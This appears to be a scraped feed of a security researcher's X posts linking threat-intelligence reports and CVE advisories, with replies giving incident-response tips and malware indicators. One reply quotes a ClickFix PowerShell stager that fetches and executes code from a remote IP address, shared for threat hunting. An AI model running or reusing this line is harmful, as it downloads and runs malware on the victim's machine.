"Fortinet Malspam lure laced with MS-Excel exploit (CVE-2017-0199) delivers Formbook -- https://www.fortinet.com/blog/threat-research/how-a-malicious-excel-file-cve-2017-0199-delivers-the-formbook-payload https://www.fortinet.com/blog/threat-research/how-a-malicious-excel-file-cve-2017-0199-delivers-the-formbook-payload"  
[X Link](https://x.com/AndreGironda/status/1930657902563610889)  2025-06-05T16:08Z [----] followers, [---] engagements


"CVE-2025-6031 Insecure device pairing in end-of-life Amazon Cloud Cam -- https://aws.amazon.com/security/security-bulletins/AWS-2025-013/ https://aws.amazon.com/security/security-bulletins/AWS-2025-013/"  
[X Link](https://x.com/AndreGironda/status/1933602197516030232)  2025-06-13T19:07Z [----] followers, [--] engagements


"ASEC Kimsuky research paper lures deliver BabyShark malware -- https://asec.ahnlab.com/en/88465 https://asec.ahnlab.com/en/88465"  
[X Link](https://x.com/AndreGironda/status/1934629384604058039)  2025-06-16T15:09Z [----] followers, [---] engagements


"Zombies never die analysis of the current status of the RapperBot botnet -- https://blog.xlab.qianxin.com/rapperbot https://blog.xlab.qianxin.com/rapperbot"  
[X Link](https://x.com/AndreGironda/status/1934978169532240014)  2025-06-17T14:15Z [----] followers, [---] engagements


"Insinuator Disclosure Multiple Vulnerabilities in X server prior to 21.1.17 and Xwayland prior to 24.1.7 CVE-2025-49175 CVE-2025-49176 CVE-2025-49177 CVE-2025-49178 CVE-2025-49179 CVE-2025-49180 -- https://insinuator.net/2025/06/disclosure-multiple-vulnerabilities-xserver-xwayland/ http://X.Org https://insinuator.net/2025/06/disclosure-multiple-vulnerabilities-xserver-xwayland/ http://X.Org"  
[X Link](https://x.com/AndreGironda/status/1935029938991808692)  2025-06-17T17:41Z [----] followers, [---] engagements


"@hetmehtaa My very-first smartphone was the [----] Samsung SCH-i600 -- and my very-first cellphone handset was the [----] Qualcomm QCP-1900 via Sprint CDMA PCS"  
[X Link](https://x.com/AndreGironda/status/1935032986111717713)  2025-06-17T17:53Z [----] followers, [--] engagements


"Zscaler Securing data in the AI era insights from the ThreatLabz [----] Data@Risk report -- https://www.zscaler.com/blogs/security-research/securing-data-ai-era-insights-2025-threatlabz-data-risk-report https://www.zscaler.com/blogs/security-research/securing-data-ai-era-insights-2025-threatlabz-data-risk-report"  
[X Link](https://x.com/AndreGironda/status/1935136404797014023)  2025-06-18T00:44Z [----] followers, [--] engagements


"Trend Investigation of AWS credential leaks via container infrastructure -- https://www.trendmicro.com/en_us/research/25/f/aws-credential-exposure-overprivileged-containers.html https://www.trendmicro.com/en_us/research/25/f/aws-credential-exposure-overprivileged-containers.html"  
[X Link](https://x.com/anyuser/status/1936972715564626374)  2025-06-23T02:20Z [----] followers, [---] engagements


"@IAMERICAbooted mcp server for elevenlabs supports audio and video from and to text -- https://elevenlabs.io/blog/introducing-elevenlabs-mcp https://elevenlabs.io/blog/introducing-elevenlabs-mcp"  
[X Link](https://x.com/AndreGironda/status/1937502836990124118)  2025-06-24T13:27Z [----] followers, [--] engagements


"Why a classic MCP Server vuln can undermine your entire AI agent -- https://www.trendmicro.com/en_us/research/25/f/why-a-classic-mcp-server-vulnerability-can-undermine-your-entire-ai-agent.html https://www.trendmicro.com/en_us/research/25/f/why-a-classic-mcp-server-vulnerability-can-undermine-your-entire-ai-agent.html"  
[X Link](https://x.com/AndreGironda/status/1937703549863100811)  2025-06-25T02:45Z [----] followers, [--] engagements


"Androxgh0st continues exploitation -- operators compromise a US university for hosting C2 logger -- https://www.cloudsek.com/blog/androxgh0st-continues-exploitation-operators-compromise-a-us-university-for-hosting-c2-logger https://www.cloudsek.com/blog/androxgh0st-continues-exploitation-operators-compromise-a-us-university-for-hosting-c2-logger"  
[X Link](https://x.com/AndreGironda/status/1937704608476074329)  2025-06-25T02:49Z [----] followers, [---] engagements


"Middle East cyber escalation -- from Hacktivism to sophisticated threat operations -- https://www.group-ib.com/blog/middle-east-cyber-escalation/ https://www.group-ib.com/blog/middle-east-cyber-escalation/"  
[X Link](https://x.com/AndreGironda/status/1937705029538091091)  2025-06-25T02:50Z [----] followers, [---] engagements


"Citrix NetScaler ADC and NetScaler Gateway -- CVE-2025-6543 -- https://support.citrix.com/support-home/kbsearch/articlearticleNumber=CTX694788 https://support.citrix.com/support-home/kbsearch/articlearticleNumber=CTX694788"  
[X Link](https://x.com/AndreGironda/status/1937864780272062950)  2025-06-25T13:25Z [----] followers, [---] engagements


"Geodigital conflict redefined -- how the Iran-Israel war is shaping a global cyber battleground -- https://www.fortinet.com/blog/ciso-collective/welcome-to-the-new-cyber-battleground https://www.fortinet.com/blog/ciso-collective/welcome-to-the-new-cyber-battleground"  
[X Link](https://x.com/AndreGironda/status/1938060411229900968)  2025-06-26T02:23Z [----] followers, [---] engagements


"FortiNet DCRat using Columbia government lure -- https://www.fortinet.com/blog/threat-research/dcrat-impersonating-the-columbian-government https://www.fortinet.com/blog/threat-research/dcrat-impersonating-the-columbian-government"  
[X Link](https://x.com/anyuser/status/1940097314091360317)  2025-07-01T17:16Z [----] followers, [---] engagements


"Group-IB Qwizzserial stealer-banker malware in Uzbekistan targeting MFA bypass for Telegram exfil -- https://www.group-ib.com/blog/rise-of-qwizzserial/ https://www.group-ib.com/blog/rise-of-qwizzserial/"  
[X Link](https://x.com/AndreGironda/status/1940612850327998725)  2025-07-03T03:25Z [----] followers, [---] engagements


"Insinunator Insecure Boot Injecting initramfs from a debug shell -- https://insinuator.net/2025/07/insecure-boot-injecting-initramfs-from-a-debug-shell/ https://insinuator.net/2025/07/insecure-boot-injecting-initramfs-from-a-debug-shell/"  
[X Link](https://x.com/AndreGironda/status/1940809935132246415)  2025-07-03T16:28Z [----] followers, [---] engagements


"Monero-mining malware -- https://www.gdatasoftware.com/blog/2025/07/38228-monero-malware-xmrig-resurgence https://www.gdatasoftware.com/blog/2025/07/38228-monero-malware-xmrig-resurgence"  
[X Link](https://x.com/AndreGironda/status/1942249584723689861)  2025-07-07T15:49Z [----] followers, [---] engagements


"@chrissanders88 Recent Lumma infections are due to malvertising-based ClickFix Mshta (perhaps also msi vbs ps1 cab et al) T1608.004 Drive-by Target with commingled T1059.*/T1204.004 Executions (e.g. User Execution: Malicious Copy and Paste) via Storm-0249 and RunMRU specifics (which follow)"  
[X Link](https://x.com/AndreGironda/status/1942628534171885676)  2025-07-08T16:55Z [----] followers, [---] engagements


"@chrissanders88 Lumma may connect to C2 (of recency note all been CloudFlare endpoints) but comes in a stealer-only form which requires other RMM or RAT capabilities to collect stealerlogs over those transfer mechanisms. The C2 identified in the recent Microsoft blog is outdated at 2025-04-15"  
[X Link](https://x.com/AndreGironda/status/1942629430335275029)  2025-07-08T16:58Z [----] followers, [--] engagements


"@chrissanders88 Microsoft did find commingled CVE-2025-27920 and CVE-2025-31191 with those C2 instances. June-July [----] C2 appears to be more of the X.509 SHA1 AE800631308F6BCBE2B3D3AB0A092DB79B4C59BB6375C7BE77CF2F291A586CA5 variety with JA4X: 5de83f524929_5de83f524929_795797892f9c"  
[X Link](https://x.com/AndreGironda/status/1942629972121903435)  2025-07-08T17:00Z [----] followers, [--] engagements


"@chrissanders88 and with a JARM of 2ad2ad0002ad2ad00042d42d00000000f78d2dc0ce6e5bbc5b8149a4872356 on the port [---] TLS services passed over CloudFlare"  
[X Link](https://x.com/AndreGironda/status/1942630068402151513)  2025-07-08T17:01Z [----] followers, [--] engagements


"@chrissanders88 Here are [--] from today to investigate for patterns -- 088cfc75271dcf2d559f8a2559e5e8fe -- 0e20b90b7ab27c84fabde0d76f3a63ad -- 54e10d4bcfd427247367229b3b8990a7"  
[X Link](https://x.com/AndreGironda/status/1942632269795213470)  2025-07-08T17:10Z [----] followers, [--] engagements


"MoonLock Labs New North Korean malware targets crypto startups via fake Zoom invites -- https://moonlock.com/malware-fake-zoom-invites https://moonlock.com/malware-fake-zoom-invites"  
[X Link](https://x.com/anyuser/status/1944045769121837090)  2025-07-12T14:46Z [----] followers, [---] engagements


"0xCH4S3 Hunting China-nexus threat actor -- https://0xch4s3.gitbook.io/0xch4s3-or-threat-research/adversary-hunting/hunting-china-nexus-threat-actor https://0xch4s3.gitbook.io/0xch4s3-or-threat-research/adversary-hunting/hunting-china-nexus-threat-actor"  
[X Link](https://x.com/anyuser/status/1944807459287392539)  2025-07-14T17:13Z [----] followers, [----] engagements


"Likely Belarus-nexus threat actor delivers loader to Poland -- https://dmpdump.github.io/posts/Belarus-nexus_Threat_Actor_Target_Poland https://dmpdump.github.io/posts/Belarus-nexus_Threat_Actor_Target_Poland"  
[X Link](https://x.com/anyuser/status/1944807899932582123)  2025-07-14T17:15Z [----] followers, [---] engagements


"Military lures created with GenAI used to distribute malware -- https://alyacofficialblog.tistory.com/5611 https://alyacofficialblog.tistory.com/5611"  
[X Link](https://x.com/AndreGironda/status/1946230170849087773)  2025-07-18T15:26Z [----] followers, [---] engagements


"Arctic Wolf Cisco updates advisory with additional maximum severity unauthenticated RCE in ISE and ISE-PIC CVE-2025-20337 -- https://arcticwolf.com/resources/blog/follow-up-cisco-updates-advisory-with-additional-maximum-severity-unauthenticated-rce-in-ise-and-ise-pic-cve-2025-20337/ https://arcticwolf.com/resources/blog/follow-up-cisco-updates-advisory-with-additional-maximum-severity-unauthenticated-rce-in-ise-and-ise-pic-cve-2025-20337/"  
[X Link](https://x.com/AndreGironda/status/1947296259561431147)  2025-07-21T14:03Z [----] followers, [---] engagements


"DataDog Beyond Mimolette tracking Mimo's expansion to Magento CMS and Docker -- https://securitylabs.datadoghq.com/articles/beyond-mimolette-tracking-mimo-expansion-magento-cms-docker https://securitylabs.datadoghq.com/articles/beyond-mimolette-tracking-mimo-expansion-magento-cms-docker"  
[X Link](https://x.com/AndreGironda/status/1947519472522432525)  2025-07-22T04:50Z [----] followers, [---] engagements


"@chrissanders88 Before [----] there wasn't much use of malicious or suspicious chrome flags but with ABE and other T1176 browser-extension TTPs ChromeLoader via Charcoal Stork and another named SmashJacker"  
[X Link](https://x.com/AndreGironda/status/1948038956223996060)  2025-07-23T15:14Z [----] followers, [---] engagements


"@chrissanders88 CHROMELOADER is a dropper which installs an infostealer and adware Chrome browser extension. Functionality includes delivering advertisements in the form of new browser tabs and datamining user search engine queries via attacker C2 over TLS"  
[X Link](https://x.com/AndreGironda/status/1948041012489883877)  2025-07-23T15:22Z [----] followers, [--] engagements


"Will the Real Salt Typhoon Please Stand Up -- https://pylos.co/2025/07/23/will-the-real-salt-typhoon-please-stand-up/ https://pylos.co/2025/07/23/will-the-real-salt-typhoon-please-stand-up/"  
[X Link](https://x.com/AndreGironda/status/1948366015408345331)  2025-07-24T12:53Z [----] followers, [---] engagements


"https://rewterz.com/threat-advisory/north-korean-apt-kimsuky-aka-black-banshee-active-iocs-54 https://rewterz.com/threat-advisory/north-korean-apt-kimsuky-aka-black-banshee-active-iocs-54"  
[X Link](https://x.com/AndreGironda/status/1949859378225631603)  2025-07-28T15:47Z [----] followers, [--] engagements


"Unpacking ShadowCoil RansomHub former-affiliate cred-harvesting tool -- https://www.esentire.com/blog/unpacking-shadowcoils-ransomhub-ex-affiliate-credential-harvesting-tool https://www.esentire.com/blog/unpacking-shadowcoils-ransomhub-ex-affiliate-credential-harvesting-tool"  
[X Link](https://x.com/AndreGironda/status/1951294394319118472)  2025-08-01T14:50Z [----] followers, [--] engagements


"Ah nm. Keeley had the first one -- -- so maybe better question how does it compare to another POC shipping hours later -- -- https://github.com/darses/CVE-2025-32433 https://github.com/platsecurity/CVE-2025-32433 https://github.com/darses/CVE-2025-32433 https://github.com/platsecurity/CVE-2025-32433"  
[X Link](https://x.com/AndreGironda/status/1951450666733588645)  2025-08-02T01:11Z [----] followers, [---] engagements


""According to a statement made by ShinyHunters yesterday . Scattered Spider and . they are one and the same" -- https://databreaches.net/2025/08/03/are-scattered-spider-and-shinyhunters-one-group-or-two-and-who-did-france-arrest/ https://databreaches.net/2025/08/03/are-scattered-spider-and-shinyhunters-one-group-or-two-and-who-did-france-arrest/"  
[X Link](https://x.com/anyuser/status/1952166414531666283)  2025-08-04T00:35Z [----] followers, [----] engagements


"Tracking AgentTesla malware behavior analysis using Joe Sandbox -- https://infosecwriteups.com/%EF%B8%8F-%EF%B8%8F-tracking-agenttesla-real-world-malware-behavior-analysis-using-joe-sandbox-60c8b923e651 https://infosecwriteups.com/%EF%B8%8F-%EF%B8%8F-tracking-agenttesla-real-world-malware-behavior-analysis-using-joe-sandbox-60c8b923e651"  
[X Link](https://x.com/AndreGironda/status/1952716752149942568)  2025-08-05T13:02Z [----] followers, [--] engagements


"@chrissanders88 Some groups like Akira will create these in PowerShell T1136.002 Create Account Domain Account. Others just use net commands. Lately there have been fancy CVE-2024-37085. Check SNOW / ChangeMgmt. Ask the regular DAs about it. If an incident occurred there may be hidden attributes"  
[X Link](https://x.com/AndreGironda/status/1952745700237746419)  2025-08-05T14:57Z [----] followers, [---] engagements


"@IceSolst I hear OpenAI and Anthropic are collaborating on a replacement for the Automated Stepper algorithm and are actually using a similar algorithm called the Thumb-Over algorithm and it's working quite well. A few people have seen it behind-closed doors and they wear AIRayBans so"  
[X Link](https://x.com/AndreGironda/status/1952844858399547415)  2025-08-05T21:31Z [----] followers, [--] engagements


"ASEC Malware disguised as cryptocurrency exchange distributed via Facebook ad -- https://asec.ahnlab.com/en/89383/ https://asec.ahnlab.com/en/89383/"  
[X Link](https://x.com/AndreGironda/status/1952935915284017217)  2025-08-06T03:33Z [----] followers, [---] engagements


"FortiNet Odyssey Stealer ClickFix malware attacks macOS users for creds and crypto wallets -- https://www.forcepoint.com/blog/x-labs/odyssey-stealer-attacks-macos-users https://www.forcepoint.com/blog/x-labs/odyssey-stealer-attacks-macos-users"  
[X Link](https://x.com/anyuser/status/1953832034251538851)  2025-08-08T14:53Z [----] followers, [----] engagements


"CVE-2025-8088 WinRar 0-day exploit -- https://socradar.io/cve-2025-8088-winrar-zero-day-exploited-targeted https://socradar.io/cve-2025-8088-winrar-zero-day-exploited-targeted"  
[X Link](https://x.com/AndreGironda/status/1954941246629392647)  2025-08-11T16:21Z [----] followers, [--] engagements


"@irsdl Why use GenAI models at all Wouldnt Elastics ELSER suffice -- no LLM no RAG yet matching use cases word-for-word Many are phasing out both foundation and quantized models. Whats the case for pre-trained transformers Growing trend: more sentiment-analysis transformers"  
[X Link](https://x.com/AndreGironda/status/1955075056499056800)  2025-08-12T01:13Z [----] followers, [--] engagements


"@chrissanders88 Link the network traffic to the process and then dump either the process memory locate the file(s) associated with the process (ideally both) and check artifacts such as SRUM that indicate this activity further. I also would dump kernel mem"  
[X Link](https://x.com/anyuser/status/1955294678607188432)  2025-08-12T15:45Z [----] followers, [---] engagements


"@chrissanders88 If found malicious these events and this incident would link up with T1071.001 App Layer Web Protocol use or T1041 Exfil over C2 at-worst case. Juiceledger is an example of a non-DPRK and non-APT actor that creates subdomains of "api." but it happened more-oft in previous years"  
[X Link](https://x.com/AndreGironda/status/1955301458120671391)  2025-08-12T16:12Z [----] followers, [---] engagements


"Akamai Coordinated response to MadeYouReset HTTP/2 protocol attacks -- https://www.akamai.com/blog/security/2025/aug/response-madeyoureset-http2-protocol-attacks https://www.akamai.com/blog/security/2025/aug/response-madeyoureset-http2-protocol-attacks"  
[X Link](https://x.com/AndreGironda/status/1956032653158932773)  2025-08-14T16:38Z [----] followers, [---] engagements


"Zscaler Termncolor and Colorinal explained -- https://www.zscaler.com/blogs/security-research/supply-chain-risk-python-termncolor-and-colorinal-explained https://www.zscaler.com/blogs/security-research/supply-chain-risk-python-termncolor-and-colorinal-explained"  
[X Link](https://x.com/AndreGironda/status/1956437682500030733)  2025-08-15T19:27Z [----] followers, [---] engagements


"@chrissanders88 Snag the sample if possible and get its file-content sha256 hash (the bytes of the file make up this hash instead of just the import table for the imphash). Then lookup that sha256 across malware-analysis engines especially VirusTotal. Run Yara (many rules) on the target sample"  
[X Link](https://x.com/AndreGironda/status/1957934049034740013)  2025-08-19T22:33Z [----] followers, [---] engagements


"@chrissanders88 Oft YARA and/or sandbox execution may reveal the function use from Advanced Windows etcetera to tune into why a perhaps-benign app is using security functions or reversely where and perhaps why the functions look or allow maliciousness"  
[X Link](https://x.com/AndreGironda/status/1957936401837879793)  2025-08-19T22:43Z [----] followers, [--] engagements


"Sliding into your DMs abusing MS-Teams for malware delivery -- https://permiso.io/blog/sliding-into-your-dms-abusing-microsoft-teams-for-malware-delivery https://permiso.io/blog/sliding-into-your-dms-abusing-microsoft-teams-for-malware-delivery"  
[X Link](https://x.com/AndreGironda/status/1961087738809041202)  2025-08-28T15:25Z [----] followers, [---] engagements


"@anton_chuvakin GenAI isn't directly-useful "miracle" AI but rather cheap Transformer access. It enables non-experts to use NLP in "kit" form yet its value decays fast without real expertise to guide it"  
[X Link](https://x.com/AndreGironda/status/1962982523379843259)  2025-09-02T20:54Z [----] followers, [---] engagements


"CVE-2025-55190 Argo CD Project API token exposes repo creds -- https://www.upwind.io/feed/cve-2025-55190-argo-cd-project-api-token-exposes-repository-credentials https://www.upwind.io/feed/cve-2025-55190-argo-cd-project-api-token-exposes-repository-credentials"  
[X Link](https://x.com/AndreGironda/status/1963958860818817469)  2025-09-05T13:34Z [----] followers, [---] engagements


"Django Unauthenticated [--] click RCE and SQL Injection using default configuration -- CVE-2025-57833 -- -- https://github.com/Mkway/CVE-2025-57833 https://infosecwriteups.com/django-unauthenticated-0-click-rce-and-sql-injection-using-default-configuration-059964f3f898 https://github.com/Mkway/CVE-2025-57833 https://infosecwriteups.com/django-unauthenticated-0-click-rce-and-sql-injection-using-default-configuration-059964f3f898"  
[X Link](https://x.com/AndreGironda/status/1963959713755996172)  2025-09-05T13:37Z [----] followers, [---] engagements


"@chrissanders88 Investigating look directly at the [----------] URI which is obviously epoch-generated. NodeInitRat aka CornFlakev3 uses this epoch in a PS1 stager from ClickFix web injects"  
[X Link](https://x.com/AndreGironda/status/1965440373435822357)  2025-09-09T15:41Z [----] followers, [---] engagements


"@chrissanders88 iex $(irm 138.199.161.141:8080/$($z = datetime::UtcNow; $y = (datetime('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = math::Floor($x); $v = $w - ($w % 16); int64$v))"  
[X Link](https://x.com/AndreGironda/status/1965440436480434596)  2025-09-09T15:41Z [----] followers, [---] engagements


"Buterat is known for its sophisticated persistence techniques and adaptive communication with C2 servers spreading through phishing malicious attachments or trojanized downloads -- https://www.pointwild.com/threat-intelligence/analysis-of-backdoor-win32-buterat https://www.pointwild.com/threat-intelligence/analysis-of-backdoor-win32-buterat"  
[X Link](https://x.com/AndreGironda/status/1965457257329819668)  2025-09-09T16:48Z [----] followers, [--] engagements


"CVE-2025-31324 critical SAP vulnerability protections -- https://www.seqrite.com/blog/cve-2025-31324-sap-vulnerability-protection https://www.seqrite.com/blog/cve-2025-31324-sap-vulnerability-protection"  
[X Link](https://x.com/AndreGironda/status/1965769279938449610)  2025-09-10T13:28Z [----] followers, [---] engagements


"@malwrhunterteam @phrack @ProtonPrivacy Proton can spin their cycles complaining or they can spin their cycles fixing and making it right. That's how you gauge an org's values"  
[X Link](https://x.com/AndreGironda/status/1965885017575534817)  2025-09-10T21:08Z [----] followers, [---] engagements


"This is a tiny lab that simulates the core idea reported for CVE-2025-54236 SessionReaper -- https://github.com/amalpvatayam67/day01-sessionreaper-lab https://github.com/amalpvatayam67/day01-sessionreaper-lab"  
[X Link](https://x.com/AndreGironda/status/1966186238978969813)  2025-09-11T17:05Z [----] followers, [---] engagements


"@chrissanders88 Check SRUM to grab IPv4s and process names first and if C2 connects are found cleanup the workstation. The workstation could use a refresh either way"  
[X Link](https://x.com/AndreGironda/status/1967970584937316849)  2025-09-16T15:15Z [----] followers, [---] engagements


"Off Your Docker exposed APIs are targeted in novel malware strain -- https://www.akamai.com/blog/security-research/2025/sep/new-malware-targeting-docker-apis-akamai-hunt https://www.akamai.com/blog/security-research/2025/sep/new-malware-targeting-docker-apis-akamai-hunt"  
[X Link](https://x.com/AndreGironda/status/1970817897779044389)  2025-09-24T11:49Z [----] followers, [---] engagements


"@greglesnewich Avast and AVG were the mid-90s go-to tools after F-PROT days so into the late 90s and really into the metasploit-framework dev days on #vax (2003-2006). VBS/Autorun.BS was rampant ala ILOVEYOU to VBS.Beast.B and then to Conficker and Stuxnet"  
[X Link](https://x.com/AndreGironda/status/1970842902122410037)  2025-09-24T13:28Z [----] followers, [--] engagements


"@greglesnewich The birth of EDR came about with the birth of DFIR. Brian Carrier wrote and released some books and craft in the early 00s with VT in [----] YARA in [----] and then Mandiant with MIR (precursor to EDR) also in [----]. FireEye dropped OpenIOC and their endpoint agent in 2010"  
[X Link](https://x.com/AndreGironda/status/1970844290676105668)  2025-09-24T13:34Z [----] followers, [--] engagements


"@greglesnewich CrowdStrike debuted in [----] and the orgs I worked for were early adopters. Fleet-wide control with actual response capabilities at the right viz levels was a sea change from even Mandiant and FireEye services and products which were way ahead of AV by then"  
[X Link](https://x.com/AndreGironda/status/1970845350161535218)  2025-09-24T13:38Z [----] followers, [--] engagements


"Netskope Beyond signatures detecting LummaStealer with an ML-powered sandbox -- https://www.netskope.com/blog/beyond-signatures-detecting-lumma-stealer-with-an-ml-powered-sandbox https://www.netskope.com/blog/beyond-signatures-detecting-lumma-stealer-with-an-ml-powered-sandbox"  
[X Link](https://x.com/AndreGironda/status/1971297150643601767)  2025-09-25T19:34Z [----] followers, [---] engagements


"@chrissanders88 Well I already gave other paths if that situation is true such as the network connect activities. Woops I already said this"  
[X Link](https://x.com/AndreGironda/status/1975683459776754035)  2025-10-07T22:03Z [----] followers, [--] engagements


"From Blobs to Blockchain takedown-resistant skimmer tricks -- https://jscrambler.com/blog/inside-takedown-resistant-skimmer-tricks https://jscrambler.com/blog/inside-takedown-resistant-skimmer-tricks"  
[X Link](https://x.com/AndreGironda/status/1976658135260803501)  2025-10-10T14:36Z [----] followers, [--] engagements


"Qilin Ransomware and the ghost bulletproof-hosting conglomerate -- https://www.resecurity.com/blog/article/qilin-ransomware-and-the-ghost-bulletproof-hosting-conglomerate https://www.resecurity.com/blog/article/qilin-ransomware-and-the-ghost-bulletproof-hosting-conglomerate"  
[X Link](https://x.com/AndreGironda/status/1978530019392532884)  2025-10-15T18:34Z [----] followers, [--] engagements


"Juniper Networks Obfuscated-PAC technique -- https://blogs.juniper.net/en-us/threat-research/invisible-obfuscation-technique-used-in-pac-attack https://blogs.juniper.net/en-us/threat-research/invisible-obfuscation-technique-used-in-pac-attack"  
[X Link](https://x.com/AndreGironda/status/1892658262656614593)  2025-02-20T19:31Z [----] followers, [---] engagements


"Separating fact from fiction -- How AI is transforming cybercrime -- https://www.fortinet.com/blog/industry-trends/separating-fact-from-fiction-how-ai-is-transforming-cybercrime https://www.fortinet.com/blog/industry-trends/separating-fact-from-fiction-how-ai-is-transforming-cybercrime"  
[X Link](https://x.com/AndreGironda/status/1920668404949688724)  2025-05-09T02:33Z [----] followers, [---] engagements


"FinalDraft malware using Microsoft services -- https://socradar.io/finaldraft-malware-the-stealthy-threat-using-microsoft-services https://socradar.io/finaldraft-malware-the-stealthy-threat-using-microsoft-services"  
[X Link](https://x.com/AndreGironda/status/1966167765909397686)  2025-09-11T15:51Z [----] followers, [---] engagements


"@chrissanders88 Just looked in VT and found PSLService is an installation executable for the DAVIE4 app suite which is used for service diagnostics and programming of PACCAR truck electronic systems such as those found in Kenworth Peterbilt and DAF vehicles"  
[X Link](https://x.com/AndreGironda/status/1973494310311174152)  2025-10-01T21:04Z [----] followers, [---] engagements


"@chrissanders88 Let's not let PACCAR off the hook for this though. It appears that at least one fake-malicious lure of their software was posted in [----] days after their own intrusion -- https://imgur.com/a/vLDuCYO https://imgur.com/a/vLDuCYO"  
[X Link](https://x.com/AndreGironda/status/1973494488883687728)  2025-10-01T21:05Z [----] followers, [--] engagements


"@chrissanders88 The DAVIE4_Service-Tester package found on VT contained a few really-odd markings base64 and python encoders and culminates in a file named with connects to tempuri.org notorious for hosting RedLineStealer and other malicious faire http://PACCAR.ITD.Management.Security http://PACCAR.ITD.Management.Security"  
[X Link](https://x.com/AndreGironda/status/1973499387868495973)  2025-10-01T21:24Z [----] followers, [--] engagements


"GhostBat RAT returns with fake RTO apps targeting Indian Android users with Telegram bot-driven malware -- https://thecyberexpress.com/ghostbat-rat https://thecyberexpress.com/ghostbat-rat"  
[X Link](https://x.com/AndreGironda/status/1978507876302770451)  2025-10-15T17:06Z [----] followers, [---] engagements


"131 Malicious Chrome extensions abused WhatsApp web in a massive spam campaign -- https://socradar.io/131-chrome-extensions-abused-whatsapp-web https://socradar.io/131-chrome-extensions-abused-whatsapp-web"  
[X Link](https://x.com/AndreGironda/status/1981009257383559594)  2025-10-22T14:46Z [----] followers, [---] engagements


"Darktrace Analysis of post-exploitation activities following CVE-2025-59287 WSUS RCE -- https://www.darktrace.com/blog/wsus-exploited-darktraces-analysis-of-post-exploitation-activities-related-to-cve-2025-59287 https://www.darktrace.com/blog/wsus-exploited-darktraces-analysis-of-post-exploitation-activities-related-to-cve-2025-59287"  
[X Link](https://x.com/AndreGironda/status/1983685189424541750)  2025-10-29T23:59Z [----] followers, [---] engagements


"Analysis of the NGate (NFC relay) malware campaig -- https://cert.pl/posts/2025/11/analiza-ngate https://cert.pl/posts/2025/11/analiza-ngate"  
[X Link](https://x.com/AndreGironda/status/1985369547508224225)  2025-11-03T15:32Z [----] followers, [---] engagements


"https://rewterz.com/threat-advisory/major-adobe-magento-rce-flaw-being-exploited-60-of-stores-at-risk https://rewterz.com/threat-advisory/major-adobe-magento-rce-flaw-being-exploited-60-of-stores-at-risk"  
[X Link](https://x.com/AndreGironda/status/1985428494164377670)  2025-11-03T19:26Z [----] followers, [---] engagements


"Dissecting the infection chain technical analysis of the Kimsuky Javascript dropper -- https://blog.pulsedive.com/dissecting-the-infection-chain-technical-analysis-of-the-kimsuky-javascript-dropper https://blog.pulsedive.com/dissecting-the-infection-chain-technical-analysis-of-the-kimsuky-javascript-dropper"  
[X Link](https://x.com/AndreGironda/status/1986138330057351325)  2025-11-05T18:27Z [----] followers, [---] engagements


"No place like localhost unauth access via Triofox CVE-2025-12480 -- https://malware.news/t/no-place-like-localhost-unauthenticated-remote-access-via-triofox-vulnerability-cve-2025-12480/101334 https://malware.news/t/no-place-like-localhost-unauthenticated-remote-access-via-triofox-vulnerability-cve-2025-12480/101334"  
[X Link](https://x.com/AndreGironda/status/1987966295233753341)  2025-11-10T19:31Z [----] followers, [---] engagements


"On Nov [--] [----] SAP published an advisory as part of their November security patches addressing a maximum severity vulnerability identified as CVE-2025-42890 in SQL Anywhere Monitor (Non-GUI) version [----]. The vulnerability involves hard-coded creds -- https://arcticwolf.com/resources/blog/cve-2025-42890 https://arcticwolf.com/resources/blog/cve-2025-42890"  
[X Link](https://x.com/AndreGironda/status/1988606731103175053)  2025-11-12T13:56Z [----] followers, [---] engagements


"CVE-2025-24893 exploit in XWiki -- https://www.vulncheck.com/blog/xwiki-under-increased-attack https://www.vulncheck.com/blog/xwiki-under-increased-attack"  
[X Link](https://x.com/AndreGironda/status/1989361664844816746)  2025-11-14T15:55Z [----] followers, [---] engagements


"@cybersecmeg @CrowdStrike meg what do you think of takedowns and other deconfliction"  
[X Link](https://x.com/AndreGironda/status/1989734878427164972)  2025-11-15T16:38Z [----] followers, [---] engagements


"Sophos WhatsApp compromise leads to Astaroth deployment -- https://news.sophos.com/en-us/2025/11/20/whatsapp-compromise-leads-to-astaroth-deployment https://news.sophos.com/en-us/2025/11/20/whatsapp-compromise-leads-to-astaroth-deployment"  
[X Link](https://x.com/AndreGironda/status/1991661730162954283)  2025-11-21T00:15Z [----] followers, [---] engagements


"Expel Stories from the SOC Mystery of the postponed proxyware inst -- https://expel.com/blog/stories-from-the-soc-mystery-of-the-postponed-proxyware-install https://expel.com/blog/stories-from-the-soc-mystery-of-the-postponed-proxyware-install"  
[X Link](https://x.com/AndreGironda/status/1992990557287948428)  2025-11-24T16:15Z [----] followers, [---] engagements


"Smishing Triad targets Egypts financial sector and postal services -- https://blog-wp.darkatlas.io/2025/11/24/smishing-triad-targets-egypts-financial-sector-and-postal-services https://blog-wp.darkatlas.io/2025/11/24/smishing-triad-targets-egypts-financial-sector-and-postal-services"  
[X Link](https://x.com/AndreGironda/status/1992990699797741740)  2025-11-24T16:16Z [----] followers, [---] engagements


"JAMF FlexibleFerret malware -- https://www.jamf.com/blog/flexibleferret-malware-continues-to-adapt https://www.jamf.com/blog/flexibleferret-malware-continues-to-adapt"  
[X Link](https://x.com/AndreGironda/status/1993381928289157157)  2025-11-25T18:11Z [----] followers, [----] engagements


"Inside Rhysida unmasking the ransomware darkweb infrastructure -- https://stealthmole-intelligence-hub.blogspot.com/2025/11/inside-rhysida-unmasking-ransomware.html https://stealthmole-intelligence-hub.blogspot.com/2025/11/inside-rhysida-unmasking-ransomware.html"  
[X Link](https://x.com/AndreGironda/status/1994415741844730193)  2025-11-28T14:39Z [----] followers, [---] engagements


"Vietnam APT Operation Hanoi Thief -- https://www.seqrite.com/blog/9479-2/ https://www.seqrite.com/blog/9479-2/"  
[X Link](https://x.com/AndreGironda/status/1994489919038001226)  2025-11-28T19:33Z [----] followers, [---] engagements


"QuietCrabs and Thor Dragons in Thunder bring KrustyLoader and Sliver via Microsoft SharePoint and Ivanti Endpoint Manager Mobile RCEs -- https://ptsecurity.com/research/pt-esc-threat-intelligence/dragons-in-thunder https://ptsecurity.com/research/pt-esc-threat-intelligence/dragons-in-thunder"  
[X Link](https://x.com/AndreGironda/status/1994490201201414200)  2025-11-28T19:34Z [----] followers, [----] engagements


